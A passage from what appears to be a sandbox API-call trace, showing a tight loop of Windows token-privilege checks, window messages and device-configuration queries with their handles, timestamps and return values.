pfResult=0x18fe54) returned 1 [0085.066] SetLastError (dwErrCode=0x522) [0085.066] CloseHandle (hObject=0x114) returned 1 [0085.066] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.066] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.066] GetLastError () returned 0x578 [0085.066] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.067] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.067] GetCurrentThread () returned 0xfffffffe [0085.067] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.067] GetLastError () returned 0x3f0 [0085.067] GetCurrentProcess () returned 0xffffffff [0085.067] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.067] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.067] SetLastError (dwErrCode=0x522) [0085.067] CloseHandle (hObject=0x114) returned 1 [0085.067] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.067] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.067] GetLastError () returned 0x578 [0085.067] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.067] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.067] GetCurrentThread () returned 0xfffffffe [0085.067] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.067] GetLastError () returned 0x3f0 [0085.067] GetCurrentProcess () returned 0xffffffff [0085.067] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.067] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.067] SetLastError (dwErrCode=0x522) [0085.067] CloseHandle (hObject=0x114) returned 1 [0085.067] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.067] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.067] GetLastError () returned 0x578 [0085.067] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.067] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.067] GetCurrentThread () returned 0xfffffffe [0085.067] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.067] GetLastError () returned 0x3f0 [0085.067] GetCurrentProcess () returned 0xffffffff [0085.067] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.067] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.067] SetLastError (dwErrCode=0x522) [0085.067] CloseHandle (hObject=0x114) returned 1 [0085.067] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.068] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.068] GetLastError () returned 0x578 [0085.068] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.068] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.068] GetCurrentThread () returned 0xfffffffe [0085.068] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.068] GetLastError () returned 0x3f0 [0085.068] GetCurrentProcess () returned 0xffffffff [0085.068] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.068] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.068] SetLastError (dwErrCode=0x522) [0085.068] CloseHandle (hObject=0x114) returned 1 [0085.068] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.068] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.068] GetLastError () returned 0x578 [0085.068] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.068] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.068] GetCurrentThread () returned 0xfffffffe [0085.068] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.068] GetLastError () returned 0x3f0 [0085.068] GetCurrentProcess () returned 0xffffffff [0085.068] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.068] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.068] SetLastError (dwErrCode=0x522) [0085.068] CloseHandle (hObject=0x114) returned 1 [0085.068] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.068] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.068] GetLastError () returned 0x578 [0085.068] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.068] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.068] GetCurrentThread () returned 0xfffffffe [0085.068] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.068] GetLastError () returned 0x3f0 [0085.068] GetCurrentProcess () returned 0xffffffff [0085.068] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.068] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.068] SetLastError (dwErrCode=0x522) [0085.069] CloseHandle (hObject=0x114) returned 1 [0085.069] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.069] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.069] GetLastError () returned 0x578 [0085.069] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.069] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.069] GetCurrentThread () returned 0xfffffffe [0085.069] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.069] GetLastError () returned 0x3f0 [0085.069] GetCurrentProcess () returned 0xffffffff [0085.069] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.069] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.069] SetLastError (dwErrCode=0x522) [0085.069] CloseHandle (hObject=0x114) returned 1 [0085.069] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.069] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.069] GetLastError () returned 0x578 [0085.069] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.069] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.069] GetCurrentThread () returned 0xfffffffe [0085.069] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.069] GetLastError () returned 0x3f0 [0085.069] GetCurrentProcess () returned 0xffffffff [0085.069] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.069] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.069] SetLastError (dwErrCode=0x522) [0085.069] CloseHandle (hObject=0x114) returned 1 [0085.069] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.069] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.069] GetLastError () returned 0x578 [0085.069] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.069] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.069] GetCurrentThread () returned 0xfffffffe [0085.069] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.069] GetLastError () returned 0x3f0 [0085.069] GetCurrentProcess () returned 0xffffffff [0085.069] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.070] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.070] SetLastError (dwErrCode=0x522) [0085.070] CloseHandle (hObject=0x114) returned 1 [0085.070] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.070] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.070] GetLastError () returned 0x578 [0085.070] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.070] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.070] GetCurrentThread () returned 0xfffffffe [0085.070] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.070] GetLastError () returned 0x3f0 [0085.070] GetCurrentProcess () returned 0xffffffff [0085.070] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.070] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.070] SetLastError (dwErrCode=0x522) [0085.070] CloseHandle (hObject=0x114) returned 1 [0085.070] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.070] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.070] GetLastError () returned 0x578 [0085.070] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.070] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.070] GetCurrentThread () returned 0xfffffffe [0085.070] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.070] GetLastError () returned 0x3f0 [0085.070] GetCurrentProcess () returned 0xffffffff [0085.070] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.070] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.070] SetLastError (dwErrCode=0x522) [0085.070] CloseHandle (hObject=0x114) returned 1 [0085.070] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.070] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.070] GetLastError () returned 0x578 [0085.070] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.070] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.070] GetCurrentThread () returned 0xfffffffe [0085.070] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.071] GetLastError () returned 0x3f0 [0085.071] GetCurrentProcess () returned 0xffffffff [0085.071] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.071] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.071] SetLastError (dwErrCode=0x522) [0085.071] CloseHandle (hObject=0x114) returned 1 [0085.071] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.071] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.071] GetLastError () returned 0x578 [0085.071] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.071] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.071] GetCurrentThread () returned 0xfffffffe [0085.071] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.071] GetLastError () returned 0x3f0 [0085.071] GetCurrentProcess () returned 0xffffffff [0085.071] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.071] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.071] SetLastError (dwErrCode=0x522) [0085.071] CloseHandle (hObject=0x114) returned 1 [0085.071] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.071] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.071] GetLastError () returned 0x578 [0085.071] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.071] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.071] GetCurrentThread () returned 0xfffffffe [0085.071] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.071] GetLastError () returned 0x3f0 [0085.071] GetCurrentProcess () returned 0xffffffff [0085.071] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.071] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.071] SetLastError (dwErrCode=0x522) [0085.071] CloseHandle (hObject=0x114) returned 1 [0085.071] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.071] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.071] GetLastError () returned 0x578 [0085.071] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.071] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.072] GetCurrentThread () returned 0xfffffffe [0085.072] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.072] GetLastError () returned 0x3f0 [0085.072] GetCurrentProcess () returned 0xffffffff [0085.072] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.072] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.072] SetLastError (dwErrCode=0x522) [0085.072] CloseHandle (hObject=0x114) returned 1 [0085.072] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.072] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.072] GetLastError () returned 0x578 [0085.072] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.072] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.072] GetCurrentThread () returned 0xfffffffe [0085.072] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.072] GetLastError () returned 0x3f0 [0085.072] GetCurrentProcess () returned 0xffffffff [0085.072] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.072] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.072] SetLastError (dwErrCode=0x522) [0085.072] CloseHandle (hObject=0x114) returned 1 [0085.072] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.072] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.072] GetLastError () returned 0x578 [0085.072] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.072] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.072] GetCurrentThread () returned 0xfffffffe [0085.072] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.072] GetLastError () returned 0x3f0 [0085.072] GetCurrentProcess () returned 0xffffffff [0085.072] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.072] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.072] SetLastError (dwErrCode=0x522) [0085.072] CloseHandle (hObject=0x114) returned 1 [0085.072] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.072] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.073] GetLastError () returned 0x578 [0085.073] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.073] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.073] GetCurrentThread () returned 0xfffffffe [0085.073] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.073] GetLastError () returned 0x3f0 [0085.073] GetCurrentProcess () returned 0xffffffff [0085.073] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.073] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.073] SetLastError (dwErrCode=0x522) [0085.073] CloseHandle (hObject=0x114) returned 1 [0085.073] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.073] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.073] GetLastError () returned 0x578 [0085.073] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.073] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.073] GetCurrentThread () returned 0xfffffffe [0085.073] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.073] GetLastError () returned 0x3f0 [0085.073] GetCurrentProcess () returned 0xffffffff [0085.073] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.073] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.073] SetLastError (dwErrCode=0x522) [0085.073] CloseHandle (hObject=0x114) returned 1 [0085.073] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.073] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.073] GetLastError () returned 0x578 [0085.073] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.073] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.073] GetCurrentThread () returned 0xfffffffe [0085.073] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.073] GetLastError () returned 0x3f0 [0085.073] GetCurrentProcess () returned 0xffffffff [0085.073] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.073] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.073] SetLastError (dwErrCode=0x522) [0085.074] CloseHandle (hObject=0x114) returned 1 [0085.074] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.074] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.074] GetLastError () returned 0x578 [0085.074] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.074] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.074] GetCurrentThread () returned 0xfffffffe [0085.074] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.074] GetLastError () returned 0x3f0 [0085.074] GetCurrentProcess () returned 0xffffffff [0085.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.074] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.074] SetLastError (dwErrCode=0x522) [0085.074] CloseHandle (hObject=0x114) returned 1 [0085.074] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.074] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.074] GetLastError () returned 0x578 [0085.074] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.074] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.074] GetCurrentThread () returned 0xfffffffe [0085.074] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.074] GetLastError () returned 0x3f0 [0085.074] GetCurrentProcess () returned 0xffffffff [0085.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.074] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, 